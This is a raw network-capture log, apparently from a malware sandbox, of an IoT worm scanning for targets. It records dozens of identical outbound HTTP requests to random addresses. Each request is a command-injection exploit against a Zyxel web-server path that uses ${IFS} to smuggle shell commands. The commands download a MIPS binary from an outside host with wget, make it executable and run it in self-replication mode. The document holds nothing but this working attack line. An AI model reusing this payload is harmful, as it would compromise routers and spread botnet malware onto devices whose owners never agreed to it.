                                              Jan 29, 2024 07:03:41.840543032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2306192.168.2.1442268109.97.12.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840570927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2307192.168.2.1446552192.76.10.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840612888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2308192.168.2.1445486217.238.86.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840641975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2309192.168.2.1433422141.39.72.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840692043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2310192.168.2.1435220141.149.78.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840734959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2311192.168.2.145349074.51.31.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840766907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2312192.168.2.1439806202.173.189.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840780973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2313192.168.2.144764220.122.48.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840838909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2314192.168.2.145972618.125.124.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840862989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2315192.168.2.145708297.88.132.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840902090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2316192.168.2.1443046173.93.205.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840936899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2317192.168.2.143380049.169.38.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840990067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2318192.168.2.1446606175.104.11.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841031075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2319192.168.2.1444258117.33.216.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841056108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2320192.168.2.1457076182.147.35.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841089010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2321192.168.2.146033671.9.43.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841124058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2322192.168.2.1439332198.164.132.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841170073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2323192.168.2.144200291.141.92.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841203928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2324192.168.2.143935096.38.248.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841238022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2325192.168.2.1455278161.177.232.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841274977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2326192.168.2.14519924.35.53.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841325045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2327192.168.2.1458546128.240.105.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841344118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2328192.168.2.1443694112.34.194.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841402054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2329192.168.2.143672038.228.195.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841427088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2330192.168.2.143872654.83.88.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841473103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2331192.168.2.14436108.12.217.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841504097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2332192.168.2.145394237.197.177.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841556072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2333192.168.2.1457914118.208.248.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841573954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2334192.168.2.1454544113.166.83.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841594934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2335192.168.2.1460528163.23.156.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841648102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2336192.168.2.144764819.166.253.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841675997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2337192.168.2.1443600219.65.185.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841721058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2338192.168.2.14451285.163.122.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841754913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2339192.168.2.1449972178.43.251.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841790915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2340192.168.2.1439352158.40.126.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841845036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2341192.168.2.1443290165.27.191.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841877937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2342192.168.2.143593424.207.144.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841916084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2343192.168.2.1457910223.71.29.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841945887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2344192.168.2.145433872.237.179.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.841993093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2345192.168.2.14538905.163.63.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842035055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2346192.168.2.1454372128.227.191.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842070103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2347192.168.2.1434240187.110.232.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842103958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2348192.168.2.144357061.248.138.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842149019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2349192.168.2.144401495.179.218.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842181921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2350192.168.2.1452178221.213.240.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842221022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2351192.168.2.1443752158.79.3.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842252016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2352192.168.2.1442630159.72.240.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842298031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2353192.168.2.144520814.127.153.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842331886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2354192.168.2.1447532134.169.74.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842366934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2355192.168.2.145043295.154.51.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842397928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2356192.168.2.145016257.45.165.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842466116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2357192.168.2.1458596201.206.167.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842499971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2358192.168.2.1453694100.229.130.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842534065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2359192.168.2.1441532134.68.56.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842557907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2360192.168.2.143762637.19.11.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842591047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2361192.168.2.1438296121.226.30.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842628002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2362192.168.2.1452394133.219.153.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842663050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2363192.168.2.144401245.182.127.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842721939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2364192.168.2.14413865.196.181.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842757940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2365192.168.2.1435462184.41.125.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842787981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2366192.168.2.1435840162.124.247.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842818022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2367192.168.2.1449460108.165.229.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842849970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2368192.168.2.1446478141.218.238.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.842869997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2369192.168.2.1460358210.154.164.224443
                                              TimestampBytes transferredDirectionData
